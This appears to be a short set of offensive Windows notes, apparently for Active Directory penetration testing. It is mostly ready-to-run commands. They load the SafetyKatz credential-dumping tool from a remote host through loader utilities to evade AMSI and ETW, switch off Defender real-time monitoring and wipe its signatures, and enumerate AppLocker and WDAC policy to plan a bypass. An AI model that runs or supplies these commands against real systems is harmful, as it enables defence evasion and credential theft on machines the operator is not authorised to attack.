# notes

## Tools

<https://github.com/Raptoratack/ADTools>

## Bypass AMSI

**Bypass AMSI and ETW based detection by loading the binary using loader utility**

```
C:\Users\Public\Loader.exe -path http://10.10.10.10/SafetyKatz.exe
C:\Users\Public\AssemblyLoad.exe http://10.10.10.10/Loader.exe -path http://10.10.10.10/SafetyKatz.exe
```

## Bypass Real-Time-monitoring

```
Powershell Set-MpPreference -DisableRealtimeMonitoring $true
Powershell Set-MpPreference -DisableIOAVProtection $true
powershell set-MpPreference -DisableAutoExclusions $true
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```

## Bypassing Applocker & WDAC Bypas

**Check if Powershell is running in Constrained Language Mode (It may be because of Applocker or WDAC)**

```
$ExecutionContext.SessionState.LanguageMode
```

**Check applocker policy for Application Whitelisting via Powerview and Registry (reg.exe)**

```
Get-AppLockerPolicy –Effective
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2"
Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2\Exe"
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
```